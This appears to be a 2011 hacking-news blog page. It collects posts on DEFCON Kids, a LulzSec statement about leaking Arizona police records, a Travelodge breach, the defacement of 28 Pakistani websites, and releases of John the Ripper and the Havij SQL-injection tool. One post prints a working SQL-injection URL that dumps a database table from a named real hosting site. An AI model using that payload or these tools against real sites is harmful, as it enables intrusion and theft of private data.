Kids (Age Between 8-16 Years) Conference to Teach "White Hat" Skills

DEFCON was started in 1993, and has grown into the largest annual gathering of hackers. Attendees to this year’s conference, DEFCON19, will include cyber-criminals, hackers, computer security professionals, security personnel, US Federal agents, and any one else with interest in anything that can be hacked. Activities at the event include speakers on different subjects of interest to hackers, social events and contents. In August the first ever DEFCON kid’s conference will take place. This conference will be run as part of the main DEFCON conference, and is meant to teach kids between 8 and 16 years “white hat” hacker skills. As opposed to “black hat” hacking, the DEFCON Kids will be taught “white hat” hacker skills that will give them the ability to protect themselves against cyber crime. Black hat involves the dark side of internet hacking, including looting of money and destruction of hardware or software. The aim is to convince kids that it is cool to fight crime by being an ethical hacker.

The courses will be run by some of the world’s most elite hackers. According to the DEFCON Kids website, the training and demonstrations will include “learning how to open Master locks, Google Hacking, making Electronics, Social Engineering, coding in Scratch and Communicating in Code.”

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Kids (Age Between 8-16 Years) Conference to Teach "White Hat" Skills"https://www.voiceofgreyhat.com/2011/06/kids-age-between-8-16-years-conference.html</a>

Arizona Law Enforcement Compromised by LulzSec

Arizona Law Enforcement Compromised by LulzSec. They released "hundreds of private intelligence bulletins, training manuals, personal email correspondence, names, phone numbers, addresses, and passwords belonging to Arizona law enforcement."


According To Lulzsec:-


"We are releasing hundreds of private intelligence bulletins, training manuals,

personal email correspondence, names, phone numbers, addresses and passwords 
belonging to Arizona law enforcement. We are targeting AZDPS specifically 
because we are against SB1070 and the racial profiling anti-immigrant police 
state that is Arizona. 

The documents classified as "law enforcement sensitive", "not for public 
distribution", and "for official use only" are primarily related to border 
patrol and counter-terrorism operations and describe the use of informants to 
infiltrate various gangs, cartels, motorcycle clubs, Nazi groups, and protest 
movements.

Every week we plan on releasing more classified documents and embarassing 
personal details of military and law enforcement in an effort not just to reveal 
their racist and corrupt nature but to purposefully sabotage their efforts to 
terrorize communities fighting an unjust "war on drugs". 

Hackers of the world are uniting and taking direct action against our common 
oppressors - the government, corporations, police, and militaries of the world. 
See you again real soon! ;D"

For More Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Arizona Law Enforcement Compromised by LulzSec"https://www.voiceofgreyhat.com/2011/06/arizona-law-enforcement-compromised-by.html</a>

Web hosting, Reseller, Vps & Dedicated services Provider Hosterbox is Vulnerable to SQL-i said Shadman Tanjim (BCA)

Web hosting, Reseller, Vps & Dedicated services Provider Hosterbox Hacked by Shadman Tanjim , Admin Bangladesh Cyber Army

According to the Hacker:- 

Website: www. hosterbox.com

Hacking Method: SQL Injection

Vulnerability risk: high

Host IP: 184.82.153.150

Web Server: Apache

Powered-by: PHP/5.2.16

Vulnerable link: http://hosterbox.com/expireddomains/index.php?ncharacter=1

Injected Link:

http://hosterbox.com/expireddomains/index.php?ncharacter=-1+union+select+group_concat%28domain,0x3a,expiration,0x3a,name,0x3a,ext%29,null,null%20FROM%20domains%20--

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Web hosting, Reseller, Vps & Dedicated services Provider Hosterbox is Vulnerable to SQL-i said Shadman Tanjim (BCA)"https://www.voiceofgreyhat.com/2011/06/web-hosting-reseller-vps-dedicated.html</a>

John the Ripper 1.7.8

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes.



What is new in John the Ripper 1.7.8 :-


The bitslice DES S-box expressions have been replaced with those generated by Roman Rusakov specifically for John the Ripper.  The corresponding assembly
code for x86 with MMX, SSE2, and for x86-64 with SSE2 has been re-generated. For other CPUs and for AVX/XOP, C compilers do a reasonably good job of generating the code from the supplied C source files (with intrinsics where relevant).  The S-box expressions that we were using before had a 21% larger gate count, so theoretically this could provide a 21% speedup.  In practice, though, a 12% to 14% speedup at DES-based crypt(3) hashes is typical. This effort has been sponsored by Rapid7
Corrected support for bcrypt (OpenBSD Blowfish) hashes of passwords containing non-ASCII characters (that is, characters with the 8th bit set). Added support for such hashes produced by crypt_blowfish up to 1.0.4, which contained a sign extension bug (inherited from older versions of John). The old buggy behavior may be enabled per-hash, using the “$2x$” prefix.
The external mode virtual machine’s performance has been improved through additional multi-op instructions matching common instruction sequences
(assign-pop and some triple- and quad-push VM instructions were added).
A few minor bug fixes and enhancements were made.


This release comes with an 17% improvement in gate count for the Data Encryption Standard (DES) algorithm by generating different S-box expressions targeting both typical CPUs with only basic instructions and CPUs/GPUs that have “bit select” instructions.


Download John the Ripper v1.7.8  HERE

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">John the Ripper 1.7.8"https://www.voiceofgreyhat.com/2011/06/john-ripper-178.html</a>

Travelodge customer data stolen

Travelodge UK is investigating an apparent hacking attack on its customer database. The hotel chain issued a warning to users of its online service to be on the lookout for spam e-mails. Full details of the security breach were not immediately available. A spokesperson said it seemed that a limited number of people were affected. No financial information or payment details were stolen in the attack, according to Travelodge.

A letter to customers, signed by the company's chief executive Guy Parsons, contains little information about the nature of the leak, although it stresses that Travelodge had not sold user data to a third party. It also quotes the spam e-mail that some customers have received.

"Good day. Don't miss exciting career opening. The company is seeking for self-motivated people in United Kingdom to help us spread out our activity in the UK area," said the message.

The company promised to give further updates once is has completed an internal investigation.

This was the Letter send by the CEO of Travelodge, by stating that Customer Data has been stolen

Thursday 23rd June 2011 (3.00pm)

Dear Customer,

Our main priority is to ensure the security of our customers’ data, which is why I wanted to make you aware, that a small number of you; may have received a spam email via the email address you have registered with us.

Please be assured, we have not sold any customer data and no financial information has been compromised.

All financial data (including credit card information) is compliant with current best practice standards and is audited to PCI (Payment Card Industry) requirements.

The safety and security of your personal information is of the upmost importance to us and as a result we are currently conducting a comprehensive investigation into this issue.

If you receive an email similar to the one detailed below, please delete it as spam.

Good day. Don't miss exciting career opening. The company is seeking for self-motivated people in United Kingdom to help us spread out our activity in the UK area. Conditions: - Full age United Kingdom resident - Only basic knowledge of Internet & computer. - Free access to personal e-mail box - 2-3 free hours per day - Immediate replies on our written requests - good organizational skills. You can without problem connect our work with your primary activity. Brilliant income ability. Free training available. Applicants must be smart and commerce motivated. Working only some hours per day. Any person residing in the United Kingdom can be our representative. Our manager will contact you within few hours if you attracted. ---------------- Local News: from paris, with love who's the toast of the airport show.

If you have any questions regarding this matter please email: andrea@travelodge.co.uk. A further update will be given, when we have completed our investigation.

Guy Parsons

Chief Executive

-News Source (BBC)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Travelodge customer data stolen"https://www.voiceofgreyhat.com/2011/06/travelodge-customer-data-stolen.html</a>

28 Pakistan Websites Hacked By Ro0t_d3vil (ICA)

28 pakistan websites hacked by an Indian Hacker named Ro0t_d3vil of ICA


Hacked Websites :-


http://aajhost.com/
http://aftabhaider.com/
http://al-kauserwelfaresociety.org/
http://albasirah.com/
http://alhadiquranacademy.com/
http://alrazaziaraat.com/
http://altanzil.net/
http://alzahraqhi.com
http://alzoha.com/
http://bluesmobile.com.pk/
http://brinepvt.com/
http://clickmarkaz.com/
http://hm-baltistan.com/
http://homeo-tel-treat.com/
http://islamabadtennis.com/
http://isopaktalibat.com/
http://karavantours.com/
http://microcyberjobs.com/
http://mountainfarmers.org/
http://online-helpers.com/
http://pakminerals.com/
http://photokar20.com/
http://yesmarketingpk.com/
http://shahgroups.net/
http://toafbr.com/
http://sarparasti.com/
http://wahdattimes.com/
http://urdujoomla.com/


Mirror Links:-


http://mirror.sec-t.net/defacements/?id=44385
http://mirror.sec-t.net/defacements/?id=44384
http://mirror.sec-t.net/defacements/?id=44410
http://mirror.sec-t.net/defacements/?id=44409
http://mirror.sec-t.net/defacements/?id=44408
http://mirror.sec-t.net/defacements/?id=44407
http://mirror.sec-t.net/defacements/?id=44406
http://mirror.sec-t.net/defacements/?id=44405
http://mirror.sec-t.net/defacements/?id=44404
http://mirror.sec-t.net/defacements/?id=44403
http://mirror.sec-t.net/defacements/?id=44402
http://mirror.sec-t.net/defacements/?id=44401
http://mirror.sec-t.net/defacements/?id=44400
http://mirror.sec-t.net/defacements/?id=44399
http://mirror.sec-t.net/defacements/?id=44398
http://mirror.sec-t.net/defacements/?id=44397
http://mirror.sec-t.net/defacements/?id=44396
http://mirror.sec-t.net/defacements/?id=44395
http://mirror.sec-t.net/defacements/?id=44394
http://mirror.sec-t.net/defacements/?id=44393
http://mirror.sec-t.net/defacements/?id=44392
http://mirror.sec-t.net/defacements/?id=44391
http://mirror.sec-t.net/defacements/?id=44390
http://mirror.sec-t.net/defacements/?id=44389
http://mirror.sec-t.net/defacements/?id=44388
http://mirror.sec-t.net/defacements/?id=44387
http://mirror.sec-t.net/defacements/?id=44386
http://mirror.sec-t.net/defacements/?id=44404  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">28 Pakistan Websites Hacked By Ro0t_d3vil (ICA)"https://www.voiceofgreyhat.com/2011/06/28-pakistan-websites-hacked-by.html</a>

Famous SQL-i tool Havij v1.15 is now Available

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the operating system.


The New features of Havij 1.15 :-

Webknight WAF bypass added.
Bypassing mod_security made better
Unicode support added
A new method for tables/columns extraction in mssql
Continuing previous tables/columns extraction made available
Custom replacement added to the settings
Default injection value added to the settings (when using %Inject_Here%)
Table and column prefix added for blind injections
Custom table and column list added.
Custom time out added.
A new md5 cracker site added
Bugfix: a bug releating to SELECT command
Bugfix: finding string column
Bugfix: getting multi column data in mssql
Bugfix: finding mysql column count
Bugfix: wrong syntax in injection string type in MsAccess
Bugfix: false positive results was removed
Bugfix: data extraction in url-encoded pages
Bugfix: loading saved projects
Bugfix: some errors in data extraction in mssql fixed.
Bugfix: a bug in MsAccess when guessing tables and columns
Bugfix: a bug when using proxy
Bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
Bugfix: false positive in finding columns count
Bugfix: when mssql error based method failed
Bugfix: a bug in saving data
Bugfix: Oracle and PostgreSQL detection

To Download Havij 1.15 Click HERE

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Famous SQL-i tool Havij v1.15 is now Available"https://www.voiceofgreyhat.com/2011/06/famous-sql-i-tool-havij-v115-is-now.html</a>